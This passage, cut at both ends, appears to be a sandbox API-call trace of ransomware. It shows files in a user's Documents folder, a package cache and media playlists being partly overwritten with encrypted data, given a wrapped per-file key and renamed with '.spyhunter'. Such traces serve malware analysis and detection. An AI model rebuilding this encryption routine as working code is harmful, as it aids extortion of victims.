halpmcxz\\documents\\sbkpc2zepujr1hbd.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SbkPC2zEPUJR1hBd.xlsx") returned 65 [0141.124] StrStrW (lpFirst="SbkPC2zEPUJR1hBd.xlsx", lpSrch=".txt") returned 0x0 [0141.124] GetProcessHeap () returned 0x2c0000 [0141.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.124] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f164*=0x2800, lpOverlapped=0x0) returned 1 [0141.125] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.125] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f164*=0x2800, lpOverlapped=0x0) returned 1 [0141.125] GetProcessHeap () returned 0x2c0000 [0141.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.125] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.125] WriteFile (in: hFile=0x170, lpBuffer=0x57f1a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x57f1a4*, lpNumberOfBytesWritten=0x57f164*=0x4, lpOverlapped=0x0) returned 1 [0141.126] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f164*=0x30, lpOverlapped=0x0) returned 1 [0141.126] CloseHandle (hObject=0x170) returned 1 [0141.126] GetProcessHeap () returned 0x2c0000 [0141.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.126] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SbkPC2zEPUJR1hBd.xlsx.spyhunter") returned 75 [0141.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SbkPC2zEPUJR1hBd.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sbkpc2zepujr1hbd.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SbkPC2zEPUJR1hBd.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sbkpc2zepujr1hbd.xlsx.spyhunter")) returned 1 [0141.126] GetProcessHeap () returned 0x2c0000 [0141.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.126] GetProcessHeap () returned 0x2c0000 [0141.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.127] GetProcessHeap () returned 0x2c0000 [0141.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5ea8 | out: hHeap=0x2c0000) returned 1 [0141.127] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1a0 | out: pbBuffer=0x57f1a0) returned 1 [0141.127] GetProcessHeap () returned 0x2c0000 [0141.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.127] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f198*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f198*=0x30) returned 1 [0141.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QLY4K-fwN3UE.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qly4k-fwn3ue.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.127] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QLY4K-fwN3UE.docx") returned 61 [0141.127] StrStrW (lpFirst="QLY4K-fwN3UE.docx", lpSrch=".txt") returned 0x0 [0141.127] GetProcessHeap () returned 0x2c0000 [0141.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.127] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f15c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f15c*=0x2800, lpOverlapped=0x0) returned 1 [0141.128] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.128] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f15c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f15c*=0x2800, lpOverlapped=0x0) returned 1 [0141.128] GetProcessHeap () returned 0x2c0000 [0141.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.128] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.128] WriteFile (in: hFile=0x170, lpBuffer=0x57f19c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f15c, lpOverlapped=0x0 | out: lpBuffer=0x57f19c*, lpNumberOfBytesWritten=0x57f15c*=0x4, lpOverlapped=0x0) returned 1 [0141.129] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f15c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f15c*=0x30, lpOverlapped=0x0) returned 1 [0141.129] CloseHandle (hObject=0x170) returned 1 [0141.129] GetProcessHeap () returned 0x2c0000 [0141.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.129] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QLY4K-fwN3UE.docx.spyhunter") returned 71 [0141.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QLY4K-fwN3UE.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qly4k-fwn3ue.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QLY4K-fwN3UE.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qly4k-fwn3ue.docx.spyhunter")) returned 1 [0141.130] GetProcessHeap () returned 0x2c0000 [0141.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.130] GetProcessHeap () returned 0x2c0000 [0141.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.130] GetProcessHeap () returned 0x2c0000 [0141.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86040 | out: hHeap=0x2c0000) returned 1 [0141.145] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f198 | out: pbBuffer=0x57f198) returned 1 [0141.145] GetProcessHeap () returned 0x2c0000 [0141.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f190*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f190*=0x30) returned 1 [0141.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\9uI_wwLo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\9ui_wwlo.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.146] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\9uI_wwLo.xlsx") returned 73 [0141.146] StrStrW (lpFirst="9uI_wwLo.xlsx", lpSrch=".txt") returned 0x0 [0141.146] GetProcessHeap () returned 0x2c0000 [0141.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.146] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f154*=0x2800, lpOverlapped=0x0) returned 1 [0141.147] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.147] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f154, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f154*=0x2800, lpOverlapped=0x0) returned 1 [0141.147] GetProcessHeap () returned 0x2c0000 [0141.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.147] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.147] WriteFile (in: hFile=0x170, lpBuffer=0x57f194*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f154, lpOverlapped=0x0 | out: lpBuffer=0x57f194*, lpNumberOfBytesWritten=0x57f154*=0x4, lpOverlapped=0x0) returned 1 [0141.147] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f154, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f154*=0x30, lpOverlapped=0x0) returned 1 [0141.147] CloseHandle (hObject=0x170) returned 1 [0141.187] GetProcessHeap () returned 0x2c0000 [0141.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0141.187] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\9uI_wwLo.xlsx.spyhunter") returned 83 [0141.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\9uI_wwLo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\9ui_wwlo.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\p4Emck\\YSQY-Zmw\\9uI_wwLo.xlsx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\p4emck\\ysqy-zmw\\9ui_wwlo.xlsx.spyhunter")) returned 1 [0141.188] GetProcessHeap () returned 0x2c0000 [0141.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0141.188] GetProcessHeap () returned 0x2c0000 [0141.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.188] GetProcessHeap () returned 0x2c0000 [0141.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb59d8 | out: hHeap=0x2c0000) returned 1 [0141.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f190 | out: pbBuffer=0x57f190) returned 1 [0141.261] GetProcessHeap () returned 0x2c0000 [0141.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0141.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57f188*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57f188*=0x30) returned 1 [0141.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.261] GetProcessHeap () returned 0x2c0000 [0141.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0141.261] GetProcessHeap () returned 0x2c0000 [0141.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f367c0 | out: hHeap=0x2c0000) returned 1 [0141.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f190 | out: pbBuffer=0x57f190) returned 1 [0141.261] GetProcessHeap () returned 0x2c0000 [0141.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0141.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57f188*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57f188*=0x30) returned 1 [0141.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\." (normalized: "c:\\users\\default\\appdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.262] GetProcessHeap () returned 0x2c0000 [0141.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0141.262] GetProcessHeap () returned 0x2c0000 [0141.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36738 | out: hHeap=0x2c0000) returned 1 [0141.262] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f188 | out: pbBuffer=0x57f188) returned 1 [0141.262] GetProcessHeap () returned 0x2c0000 [0141.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0141.262] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x57f180*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x57f180*=0x30) returned 1 [0141.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\.." (normalized: "c:\\users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.262] GetProcessHeap () returned 0x2c0000 [0141.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0141.262] GetProcessHeap () returned 0x2c0000 [0141.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0141.262] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f188 | out: pbBuffer=0x57f188) returned 1 [0141.262] GetProcessHeap () returned 0x2c0000 [0141.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0141.262] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x57f180*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x57f180*=0x30) returned 1 [0141.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\." (normalized: "c:\\users\\default\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.263] GetProcessHeap () returned 0x2c0000 [0141.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0141.263] GetProcessHeap () returned 0x2c0000 [0141.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.263] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f108 | out: pbBuffer=0x57f108) returned 1 [0141.263] GetProcessHeap () returned 0x2c0000 [0141.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.263] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f100*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f100*=0x30) returned 1 [0141.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.264] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 130 [0141.264] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0141.264] GetProcessHeap () returned 0x2c0000 [0141.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.264] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0141.338] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.338] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0141.338] GetProcessHeap () returned 0x2c0000 [0141.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.338] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.338] WriteFile (in: hFile=0xf0, lpBuffer=0x57f104*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f0c4, lpOverlapped=0x0 | out: lpBuffer=0x57f104*, lpNumberOfBytesWritten=0x57f0c4*=0x4, lpOverlapped=0x0) returned 1 [0141.340] WriteFile (in: hFile=0xf0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f0c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f0c4*=0x30, lpOverlapped=0x0) returned 1 [0141.340] CloseHandle (hObject=0xf0) returned 1 [0141.372] GetProcessHeap () returned 0x2c0000 [0141.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.372] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.spyhunter") returned 140 [0141.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.spyhunter")) returned 1 [0141.373] GetProcessHeap () returned 0x2c0000 [0141.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.373] GetProcessHeap () returned 0x2c0000 [0141.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.373] GetProcessHeap () returned 0x2c0000 [0141.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4d50 | out: hHeap=0x2c0000) returned 1 [0141.378] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0f8 | out: pbBuffer=0x57f0f8) returned 1 [0141.378] GetProcessHeap () returned 0x2c0000 [0141.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.378] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0f0*=0x30) returned 1 [0141.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.379] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl") returned 104 [0141.379] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0141.379] GetProcessHeap () returned 0x2c0000 [0141.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.379] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f0b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f0b4*=0x437, lpOverlapped=0x0) returned 1 [0141.447] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.447] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x57f0b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f0b4*=0x437, lpOverlapped=0x0) returned 1 [0141.448] GetProcessHeap () returned 0x2c0000 [0141.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.448] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.448] WriteFile (in: hFile=0x184, lpBuffer=0x57f0f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f0b4, lpOverlapped=0x0 | out: lpBuffer=0x57f0f4*, lpNumberOfBytesWritten=0x57f0b4*=0x4, lpOverlapped=0x0) returned 1 [0141.448] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f0b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f0b4*=0x30, lpOverlapped=0x0) returned 1 [0141.448] CloseHandle (hObject=0x184) returned 1 [0141.448] GetProcessHeap () returned 0x2c0000 [0141.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.448] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.spyhunter") returned 114 [0141.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl.spyhunter")) returned 1 [0141.449] GetProcessHeap () returned 0x2c0000 [0141.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.449] GetProcessHeap () returned 0x2c0000 [0141.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.449] GetProcessHeap () returned 0x2c0000 [0141.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffae10 | out: hHeap=0x2c0000) returned 1 [0141.449] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0f0 | out: pbBuffer=0x57f0f0) returned 1 [0141.450] GetProcessHeap () returned 0x2c0000 [0141.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0e8*=0x30) returned 1 [0141.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 